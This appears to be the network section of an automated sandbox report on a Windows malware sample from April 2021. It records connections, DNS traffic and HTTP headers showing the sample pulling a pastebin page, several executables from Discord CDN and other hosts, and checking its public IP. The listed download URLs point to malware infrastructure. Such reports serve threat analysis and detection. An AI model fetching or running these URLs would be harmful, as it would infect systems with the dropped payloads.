Network Analysis
IP Address | Status | Action |
---|---|---|
104.23.98.190 | Active | Moloch |
162.159.129.233 | Active | Moloch |
164.124.101.2 | Active | Moloch |
188.68.221.233 | Active | Moloch |
194.106.216.70 | Active | Moloch |
195.123.215.21 | Active | Moloch |
203.159.80.228 | Active | Moloch |
217.144.96.35 | Active | Moloch |
23.21.252.4 | Active | Moloch |
88.99.66.31 | Active | Moloch |
- TCP Requests
-
-
192.168.56.101:49202 104.23.98.190:443pastebin.com
-
192.168.56.101:49204 162.159.129.233:443cdn.discordapp.com
-
192.168.56.101:49207 162.159.129.233:443cdn.discordapp.com
-
188.68.221.233:80 192.168.56.101:49220
-
188.68.221.233:80 192.168.56.101:49226
-
192.168.56.101:49209 194.106.216.70:443fex.net
-
192.168.56.101:49208 195.123.215.21:80whatitis.club
-
192.168.56.101:49203 203.159.80.228:80
-
192.168.56.101:49205 217.144.96.35:80gurums.info
-
192.168.56.101:49206 217.144.96.35:80gurums.info
-
192.168.56.101:49216 23.21.252.4:80api.ipify.org
-
192.168.56.101:49210 88.99.66.31:443iplogger.org
-
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:55450 164.124.101.2:53
-
192.168.56.101:56977 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:65329 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
8.8.8.8:53 192.168.56.101:56887
-
8.8.8.8:53 192.168.56.101:57460
-
8.8.8.8:53 192.168.56.101:65329
-
GET
200
https://pastebin.com/raw/VVpUeH0C
REQUEST
RESPONSE
BODY
GET /raw/VVpUeH0C HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:28:00 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db90641bb9dcf13375f4e86778fd5949b1617596879; expires=Wed, 05-May-21 04:27:59 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
cf-request-id: 0941e2a8960000e9d85aaf3000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 63b006edbbe1e9d8-ICN
GET
200
https://cdn.discordapp.com/attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:28:07 GMT
Content-Type: application/x-msdos-program
Content-Length: 505856
Connection: keep-alive
Set-Cookie: __cfduid=d4cf7c7f9f3f4a06f260720fcc1a69fe51617596887; expires=Wed, 05-May-21 04:28:07 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b00721dff8e9f0-ICN
Accept-Ranges: bytes
Age: 451896
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
ETag: "28345a7bb63babaf99e760965ce493b7"
Expires: Tue, 05 Apr 2022 04:28:07 GMT
Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e2c92b0000e9f0d0826000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617132901889175
x-goog-hash: crc32c=Ws/4nQ==
x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 505856
X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TLpBLQmgFXy6H8BnagOTruJ4Vqn%2Fw1s7OqqBoB7OD7m1U1UJd6OtvH2fN8DlTMSTkNfboawWgKZ%2FZ4kGE3UsJaXlD3grdOUTcD438M6Xw69KdM0%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
403
https://cdn.discordapp.com/attachments/826416818390040589/826855866228670474/7525b875715555.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:28:07 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d8cd18283577c7710584319e7b75b91e71617596887; expires=Wed, 05-May-21 04:28:07 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63b007224cf53532-ICN
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:28:07 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941e2c9700000353262a72000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UweGdpxKnA0oqPmHGiWqUQGiYQ2LsTpPq-VEBeY-w_3LSy_yH34lxwniTQ5xKzeTn4eo_ZqhOJn5GN4rWbkzgAlx661mg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bXDXFYViyFNVmXz9pGWeIX47KIAvi4XwsoPkJGASviKHjes%2FmKPuFNxCBK008yfirjbXSQ0RXv2mfquDwbDT%2FRWnFZrAMLu08E7Punju2J5WpaQ%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://fex.net/uk/s/o1ovzfe
REQUEST
RESPONSE
BODY
GET /uk/s/o1ovzfe HTTP/1.1
Host: fex.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Mon, 05 Apr 2021 04:28:30 GMT
Content-Type: text/html
Content-Length: 7520
Last-Modified: Sun, 28 Mar 2021 18:01:14 GMT
Connection: keep-alive
ETag: "6060c46a-1d60"
X-Robots-Tag: noindex, nofollow
Accept-Ranges: bytes
GET
301
https://iplogger.org/2LehR6.exe
REQUEST
RESPONSE
BODY
GET /2LehR6.exe HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Apr 2021 04:28:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=n7p8kbs39uk4m2k44b5fd0uju6; path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451281; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:28:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d271a7de8974181c19a710d7b377f60621617596912; expires=Wed, 05-May-21 04:28:32 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 0941e32c040000e9f0b906c000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3jE%2B2KjgpHzSd2dfj1Cw8QsLAIGLSY2sD08%2FQjzoUKQaOvRiXaOh3IVnFt8I6%2BvPcqJrCgiPWR96Css3VOJNkPYZZC9TT3K%2BwiP3FPLvayX%2Fjvw%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63b007bffa8de9f0-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET
200
http://203.159.80.228/downloads/sfx_123_400.exe
REQUEST
RESPONSE
BODY
GET /downloads/sfx_123_400.exe HTTP/1.1
Host: 203.159.80.228
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:28:06 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.2
Last-Modified: Fri, 02 Apr 2021 20:26:09 GMT
ETag: "112eee-5bf0328827a40"
Accept-Ranges: bytes
Content-Length: 1126126
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET
200
http://gurums.info/lukkeze.best.exe
REQUEST
RESPONSE
BODY
GET /lukkeze.best.exe HTTP/1.1
Host: gurums.info
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/x-msdownload
Last-Modified: Wed, 10 Mar 2021 07:13:04 GMT
Etag: "4280e-60487180-eb142a97dab1e4c8;;;"
Accept-Ranges: bytes
Content-Length: 272398
Date: Mon, 05 Apr 2021 04:28:06 GMT
Server: LiteSpeed
GET
200
http://gurums.info/MMP2.exe
REQUEST
RESPONSE
BODY
GET /MMP2.exe HTTP/1.1
Host: gurums.info
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/x-msdownload
Last-Modified: Mon, 05 Apr 2021 04:25:04 GMT
Etag: "4900e-606a9120-3dbe9eacf94eed7a;;;"
Accept-Ranges: bytes
Content-Length: 299022
Date: Mon, 05 Apr 2021 04:28:06 GMT
Server: LiteSpeed
GET
200
http://whatitis.club/load.php?pub=mixruzki
REQUEST
RESPONSE
BODY
GET /load.php?pub=mixruzki HTTP/1.1
Host: whatitis.club
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Apr 2021 04:28:07 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
GET
200
http://api.ipify.org/?format=xml
REQUEST
RESPONSE
BODY
GET /?format=xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: api.ipify.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Mon, 05 Apr 2021 04:28:45 GMT
Content-Length: 15
Via: 1.1 vegur
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts